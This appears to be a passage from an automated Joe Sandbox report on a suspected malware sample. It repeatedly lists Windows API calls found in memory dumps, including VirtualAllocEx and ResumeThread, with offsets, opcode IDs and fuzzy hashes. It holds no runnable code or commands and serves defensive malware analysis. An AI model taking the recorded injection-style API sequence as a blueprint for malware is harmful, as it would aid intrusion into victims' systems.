                                                                                                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018BBF99,00000800,00000000,00000000), ref: 018BC1AA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018BBF99,00000800,00000000,00000000), ref: 018BC1AA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07865BFE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0786992D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0786992D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 018BBF1E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: O};5
                                                                                                                                                                            • API String ID: 0-3558557551
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f616e30ddcba6d69010d382ce662dbd7fabbc8ff32a3ca61739f08bb46d3c026
                                                                                                                                                                            • Instruction ID: 1b5aa977386c0b9afdf30840375ec47268e2e6b7e0d4a7aa99657a073857a32a
                                                                                                                                                                            • Opcode Fuzzy Hash: f616e30ddcba6d69010d382ce662dbd7fabbc8ff32a3ca61739f08bb46d3c026
                                                                                                                                                                            • Instruction Fuzzy Hash: E962E071F01B858AEF749B74D59C3ADBEE1BB41300F10592FC8BACE255DB3998818B46
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b97519444ddc1a2dd40cbf1319643422efb1608b92a4201caa201cb1147a7279
                                                                                                                                                                            • Instruction ID: fdf04e7e38d3916762a633bc4d8f45394eb7343b804aee71e35a05e7493722f5
                                                                                                                                                                            • Opcode Fuzzy Hash: b97519444ddc1a2dd40cbf1319643422efb1608b92a4201caa201cb1147a7279
                                                                                                                                                                            • Instruction Fuzzy Hash: 39125DB1A05BC64AEF749F64D58C3AEBAE0BB05300F20592BC8FACD255C73894C6DB45
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4e2b8ca143515690fbbe7cea302a6f1748db8534bdda4e1d4d48943b53b0bf56
                                                                                                                                                                            • Instruction ID: d5bd71eaceb2c9e01ca013c2c4ac99f88558fd3b79ee58da053f377582364d67
                                                                                                                                                                            • Opcode Fuzzy Hash: 4e2b8ca143515690fbbe7cea302a6f1748db8534bdda4e1d4d48943b53b0bf56
                                                                                                                                                                            • Instruction Fuzzy Hash: CA918C71A01308DFEB14DBA9D8446AEBBF6FF84310F14846AE855E7750CB34AC42CB91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ded782d464ce76d87ec8406b80ebc0aca55c69911799335d47698d6ef72ed675
                                                                                                                                                                            • Instruction ID: 095b967a82d044845aab3b9e7c2fa65a8e59507082c110895abdad5f426aa580
                                                                                                                                                                            • Opcode Fuzzy Hash: ded782d464ce76d87ec8406b80ebc0aca55c69911799335d47698d6ef72ed675
                                                                                                                                                                            • Instruction Fuzzy Hash: CD81E2397106008FDB08EF28D4989697BF6FF89A15B1581A9E902CB772DB71EC41CB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 847db8304b7b2de8bae4db2b2e7d5de26b2bef83bf0e01c2a9d24ffca50f94d4
                                                                                                                                                                            • Instruction ID: 5a42035ea778b9921532c5d2f70c7ab42bd4c06f5e654682c38975ac811b6bf5
                                                                                                                                                                            • Opcode Fuzzy Hash: 847db8304b7b2de8bae4db2b2e7d5de26b2bef83bf0e01c2a9d24ffca50f94d4
                                                                                                                                                                            • Instruction Fuzzy Hash: B1816C71E003188FDB14DFA9C9946AEBBF6FF88310F14812AE409EB354DB345946CBA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3f04d84ef5235e8994134fc8bfb9cfa1677507f23b6addb184cde5aca9205233
                                                                                                                                                                            • Instruction ID: 8d5488aa536740a4b94e45e2219e74b42467a7aa9cbcdaf98aef93a9df54f58d
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f04d84ef5235e8994134fc8bfb9cfa1677507f23b6addb184cde5aca9205233
                                                                                                                                                                            • Instruction Fuzzy Hash: 23712C35B042188FDB14EF68C5949ADB7F2BF8C310B2444A9D806EB365CB36AD41CF65
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 67c6a0dbc726ddcc5786bff889eae8536ae6b52846ed59e8fd0bfd318204b5e1
                                                                                                                                                                            • Instruction ID: 5e9b04de07ce92473bead81bc9c45d99f6404dc12dbb9d89a4cbafad19718cbb
                                                                                                                                                                            • Opcode Fuzzy Hash: 67c6a0dbc726ddcc5786bff889eae8536ae6b52846ed59e8fd0bfd318204b5e1
                                                                                                                                                                            • Instruction Fuzzy Hash: 4C6125B4E1524DDFCB14CFA9D4846EEBBBAFF9A304F109029E52AA7215CB305942DF41
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a7c5c6dd4d5745f7ec32a325c5088d68cf17d00e2573f4c9b0eff2e441b99907
                                                                                                                                                                            • Instruction ID: 0283578d511bbbbf8256dafec89ee5b6182c9357219abb95303e230bb0955d6d
                                                                                                                                                                            • Opcode Fuzzy Hash: a7c5c6dd4d5745f7ec32a325c5088d68cf17d00e2573f4c9b0eff2e441b99907
                                                                                                                                                                            • Instruction Fuzzy Hash: 43719C35A01209AFDB14DF69D888DAEBBB6FF48760F114498F905AB361DB31EC81CB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a7261cb17693dd4a6fae053242d95570d1d57b04f9c7398953660ebe23cde49a
                                                                                                                                                                            • Instruction ID: 8e646fdbfd93f28e1147abdd6537d4001d6721e81dc6cc123b66926527f77095
                                                                                                                                                                            • Opcode Fuzzy Hash: a7261cb17693dd4a6fae053242d95570d1d57b04f9c7398953660ebe23cde49a
                                                                                                                                                                            • Instruction Fuzzy Hash: 2241E935A002188FDB54EB68C894BDDB7B6BF89704F114468D905EB3A1DB38AD01CFA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f36972f6d5fe76d9bfa65d6309c0c054fdb7abfa8747519ff00d367e9994682d
                                                                                                                                                                            • Instruction ID: 5b3cf193b1c74d769f69cb2b55e43c37622d3daa4f8e16a038be979f3abb3b87
                                                                                                                                                                            • Opcode Fuzzy Hash: f36972f6d5fe76d9bfa65d6309c0c054fdb7abfa8747519ff00d367e9994682d
                                                                                                                                                                            • Instruction Fuzzy Hash: FB417BB5E1020A9FCB05CF95D8819EEBBB6FB89310F209529E505FB354D7749A41CFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b15546acbd8556bba35a239062316c2df6095071f23081222ec0a9de9d28482b
                                                                                                                                                                            • Instruction ID: a2012af814025f4f102560e96fb405236d15eab6ac92242c9cff5128cedffba0
                                                                                                                                                                            • Opcode Fuzzy Hash: b15546acbd8556bba35a239062316c2df6095071f23081222ec0a9de9d28482b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9C310435A00209AFDB18DFA8D95999EBFB6FF99310F108559F802AB354DF31AD01CB91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 978003869d6214c82475ffd25d7301688e01dabe6bb493673ea5bfdb04ee04cb
                                                                                                                                                                            • Instruction ID: 04f230b786dcb31511ce55895dbab6d05b4ced44c0c130d0923159bec977e99a
                                                                                                                                                                            • Opcode Fuzzy Hash: 978003869d6214c82475ffd25d7301688e01dabe6bb493673ea5bfdb04ee04cb
                                                                                                                                                                            • Instruction Fuzzy Hash: D33159B1900309AFDB14DFA9D885ADEBFF5FB48320F10842AE919E7210D735A945CFA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9fc0dcd0d2d777d1f4e0e0df99dfd57ffd27de6cee46cd05c84091309307aff9
                                                                                                                                                                            • Instruction ID: 2358758273b5451cd9094c06bd568cca436a411a5db7fe1406be1cf226c8381f
                                                                                                                                                                            • Opcode Fuzzy Hash: 9fc0dcd0d2d777d1f4e0e0df99dfd57ffd27de6cee46cd05c84091309307aff9
                                                                                                                                                                            • Instruction Fuzzy Hash: ED313431B083158FDB15EB79C854A6E7BBBFFC5210B1489AAD446CB365CE309C06C7A2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ac0a2fd3953b5d963aeaec9335e0011960016df95e7890190c4becf1a6efa947
                                                                                                                                                                            • Instruction ID: 818062809bac4f21673c4e1c9055aa20f7610c9c61812a08e8dd17d0666945dd
                                                                                                                                                                            • Opcode Fuzzy Hash: ac0a2fd3953b5d963aeaec9335e0011960016df95e7890190c4becf1a6efa947
                                                                                                                                                                            • Instruction Fuzzy Hash: AC41D2B1D0030DCBDF20DFA9C585A8EFBB5BF48304F648429D819AB250D7B56A4ACF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4adc91754df452cac1b548e44072fdccaaf51af779f2842dbd58b2702302a905
                                                                                                                                                                            • Instruction ID: d262b5a7e010a006dd3ad89a9de38f41857d83994ecec694d96eaf2ad02b5b9a
                                                                                                                                                                            • Opcode Fuzzy Hash: 4adc91754df452cac1b548e44072fdccaaf51af779f2842dbd58b2702302a905
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A41D1B1D00309CBEF20DFA9C985ACDFBB5BF48304F248429D419AB250D7B56A4ACF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b589e7de9be0aa2bfabbf7be95bf5e33622e1b150bec2f48af1dfb951afeb757
                                                                                                                                                                            • Instruction ID: ac2dfcaf92d831a7ac516ae179617bee68f9164c20f8b1e03acbead3685cc450
                                                                                                                                                                            • Opcode Fuzzy Hash: b589e7de9be0aa2bfabbf7be95bf5e33622e1b150bec2f48af1dfb951afeb757
                                                                                                                                                                            • Instruction Fuzzy Hash: B3419DB1D103589FDB14CF9AC884A9EFBB1FF48710F64822AE819AB254D7746845CF94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 29ccd7d4c35fe0d4a988ff3372ab05757326bdf9cfba898b2182c4cecead600a
                                                                                                                                                                            • Instruction ID: eb3f44904a888dff93710c2558363e1c4fbb30147c1ff70929792e1097925c97
                                                                                                                                                                            • Opcode Fuzzy Hash: 29ccd7d4c35fe0d4a988ff3372ab05757326bdf9cfba898b2182c4cecead600a
                                                                                                                                                                            • Instruction Fuzzy Hash: C931CD36A0461ACFDF00DF68D8805BE7BB2FF45201B04886AEC04DB252E634CC86C7A1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 000d054dedf2309e94f8433c7fcb30a8408fcb36f369499cdfa9e99b28c3b4de
                                                                                                                                                                            • Instruction ID: e0085bf9c29829a0e47d5cf1f37a08070b32b8bde2df7ac1eaee064d91c1df78
                                                                                                                                                                            • Opcode Fuzzy Hash: 000d054dedf2309e94f8433c7fcb30a8408fcb36f369499cdfa9e99b28c3b4de
                                                                                                                                                                            • Instruction Fuzzy Hash: 82317476F003098BFB29EB78C0547BDBAB3EF88201F144469D901E7650DA794D81CBA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
